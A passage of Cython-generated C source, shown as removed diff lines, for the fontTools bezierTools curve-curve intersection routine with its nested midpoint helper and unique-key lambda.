__pyx_v_curve2, __pyx_v_precision, __pyx_v_range1, __pyx_v_range2); - - /* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1322 - * return [] - * - * def midpoint(r): # <<<<<<<<<<<<<< - * return 0.5 * (r[0] + r[1]) - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_1midpoint(PyObject 
*__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_1midpoint = {"midpoint", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_1midpoint, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_1midpoint(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_r = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("midpoint (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_r,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_r)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) 
__PYX_ERR(0, 1322, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "midpoint") < 0)) __PYX_ERR(0, 1322, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_r = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("midpoint", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1322, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t.midpoint", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_self, __pyx_v_r); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_r) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("midpoint", 1); - - /* "fontTools/misc/bezierTools.py":1323 - * - 
* def midpoint(r): - * return 0.5 * (r[0] + r[1]) # <<<<<<<<<<<<<< - * - * # If they do overlap but they're tiny, approximate - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_r, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_r, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Add(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_float_0_5, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1323, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1322 - * return [] - * - * def midpoint(r): # <<<<<<<<<<<<<< - * return 0.5 * (r[0] + r[1]) - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t.midpoint", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1359 - * ) - * - * unique_key = lambda ts: (int(ts[0] / precision), int(ts[1] / precision)) # <<<<<<<<<<<<<< - * seen = set() - * unique_values = [] - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_2lambda3(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); 
/*proto*/ -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_2lambda3 = {"lambda3", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_2lambda3, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_2lambda3(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("lambda3 (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_ts,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ts)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1359, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if 
(unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "lambda3") < 0)) __PYX_ERR(0, 1359, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_ts = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("lambda3", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1359, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t.lambda3", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_lambda_funcdef_lambda3(__pyx_self, __pyx_v_ts); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_lambda_funcdef_lambda3(PyObject *__pyx_self, PyObject *__pyx_v_ts) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *__pyx_cur_scope; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *__pyx_outer_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("lambda3", 1); - __pyx_outer_scope = (struct 
__pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *) __Pyx_CyFunction_GetClosure(__pyx_self); - __pyx_cur_scope = __pyx_outer_scope; - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_ts, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - if (unlikely(!__pyx_cur_scope->__pyx_v_precision)) { __Pyx_RaiseClosureNameError("precision"); __PYX_ERR(0, 1359, __pyx_L1_error) } - __pyx_t_2 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_cur_scope->__pyx_v_precision); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyNumber_Int(__pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_ts, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (unlikely(!__pyx_cur_scope->__pyx_v_precision)) { __Pyx_RaiseClosureNameError("precision"); __PYX_ERR(0, 1359, __pyx_L1_error) } - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_t_2, __pyx_cur_scope->__pyx_v_precision); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyNumber_Int(__pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1)) __PYX_ERR(0, 1359, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2)) __PYX_ERR(0, 1359, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_r = 
__pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t.lambda3", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_84_curve_curve_intersections_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve1, PyObject *__pyx_v_curve2, PyObject *__pyx_v_precision, PyObject *__pyx_v_range1, PyObject *__pyx_v_range2) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *__pyx_cur_scope; - PyObject *__pyx_v_bounds1 = NULL; - PyObject *__pyx_v_bounds2 = NULL; - PyObject *__pyx_v_intersects = NULL; - CYTHON_UNUSED PyObject *__pyx_v__ = NULL; - PyObject *__pyx_v_midpoint = 0; - PyObject *__pyx_v_c11 = NULL; - PyObject *__pyx_v_c12 = NULL; - PyObject *__pyx_v_c11_range = NULL; - PyObject *__pyx_v_c12_range = NULL; - PyObject *__pyx_v_c21 = NULL; - PyObject *__pyx_v_c22 = NULL; - PyObject *__pyx_v_c21_range = NULL; - PyObject *__pyx_v_c22_range = NULL; - PyObject *__pyx_v_found = NULL; - PyObject *__pyx_v_unique_key = NULL; - PyObject *__pyx_v_seen = NULL; - PyObject *__pyx_v_unique_values = NULL; - PyObject *__pyx_v_ts = NULL; - PyObject *__pyx_v_key = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - int __pyx_t_5; - int __pyx_t_6; - PyObject *__pyx_t_7 = NULL; - PyObject *(*__pyx_t_8)(PyObject *); - int __pyx_t_9; - Py_ssize_t __pyx_t_10; - int __pyx_lineno = 0; - 
const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_curve_curve_intersections_t", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 1306, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_v_precision = __pyx_v_precision; - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_INCREF(__pyx_v_range1); - __Pyx_INCREF(__pyx_v_range2); - - /* "fontTools/misc/bezierTools.py":1309 - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - * bounds1 = _curve_bounds(curve1) # <<<<<<<<<<<<<< - * bounds2 = _curve_bounds(curve2) - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_curve_bounds); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1309, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_curve1}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1309, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - 
__Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_v_bounds1 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1310 - * ): - * bounds1 = _curve_bounds(curve1) - * bounds2 = _curve_bounds(curve2) # <<<<<<<<<<<<<< - * - * if not range1: - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_curve_bounds); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1310, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_curve2}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1310, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_v_bounds2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1312 - * bounds2 = _curve_bounds(curve2) - * - * if not range1: # <<<<<<<<<<<<<< - * range1 = (0.0, 1.0) - * if not range2: - */ - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_v_range1); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1312, __pyx_L1_error) - __pyx_t_6 = (!__pyx_t_5); - if (__pyx_t_6) { - - /* "fontTools/misc/bezierTools.py":1313 - * - * if not range1: - * range1 = (0.0, 1.0) # <<<<<<<<<<<<<< - * if not range2: - * range2 = (0.0, 1.0) - */ - __Pyx_INCREF(__pyx_tuple__5); - __Pyx_DECREF_SET(__pyx_v_range1, __pyx_tuple__5); - - /* "fontTools/misc/bezierTools.py":1312 - * bounds2 = _curve_bounds(curve2) - * - * if not range1: # <<<<<<<<<<<<<< - * range1 = (0.0, 1.0) - * if not range2: - */ - } - - /* "fontTools/misc/bezierTools.py":1314 - * if not range1: - * range1 = (0.0, 1.0) - * 
if not range2: # <<<<<<<<<<<<<< - * range2 = (0.0, 1.0) - * - */ - __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_v_range2); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1314, __pyx_L1_error) - __pyx_t_5 = (!__pyx_t_6); - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1315 - * range1 = (0.0, 1.0) - * if not range2: - * range2 = (0.0, 1.0) # <<<<<<<<<<<<<< - * - * # If bounds don't intersect, go home - */ - __Pyx_INCREF(__pyx_tuple__5); - __Pyx_DECREF_SET(__pyx_v_range2, __pyx_tuple__5); - - /* "fontTools/misc/bezierTools.py":1314 - * if not range1: - * range1 = (0.0, 1.0) - * if not range2: # <<<<<<<<<<<<<< - * range2 = (0.0, 1.0) - * - */ - } - - /* "fontTools/misc/bezierTools.py":1318 - * - * # If bounds don't intersect, go home - * intersects, _ = sectRect(bounds1, bounds2) # <<<<<<<<<<<<<< - * if not intersects: - * return [] - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_sectRect); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_bounds1, __pyx_v_bounds2}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) 
__Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1318, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_7 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - index = 0; __pyx_t_2 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_3 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_3)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 2) < 0) __PYX_ERR(0, 1318, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1318, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_intersects = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v__ = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1319 - * # If bounds don't intersect, go home - * intersects, _ = sectRect(bounds1, bounds2) - * if not intersects: # <<<<<<<<<<<<<< - * return [] - * - 
*/ - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_v_intersects); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1319, __pyx_L1_error) - __pyx_t_6 = (!__pyx_t_5); - if (__pyx_t_6) { - - /* "fontTools/misc/bezierTools.py":1320 - * intersects, _ = sectRect(bounds1, bounds2) - * if not intersects: - * return [] # <<<<<<<<<<<<<< - * - * def midpoint(r): - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1320, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1319 - * # If bounds don't intersect, go home - * intersects, _ = sectRect(bounds1, bounds2) - * if not intersects: # <<<<<<<<<<<<<< - * return [] - * - */ - } - - /* "fontTools/misc/bezierTools.py":1322 - * return [] - * - * def midpoint(r): # <<<<<<<<<<<<<< - * return 0.5 * (r[0] + r[1]) - * - */ - __pyx_t_1 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_1midpoint, 0, __pyx_n_s_curve_curve_intersections_t_loc, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__7)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 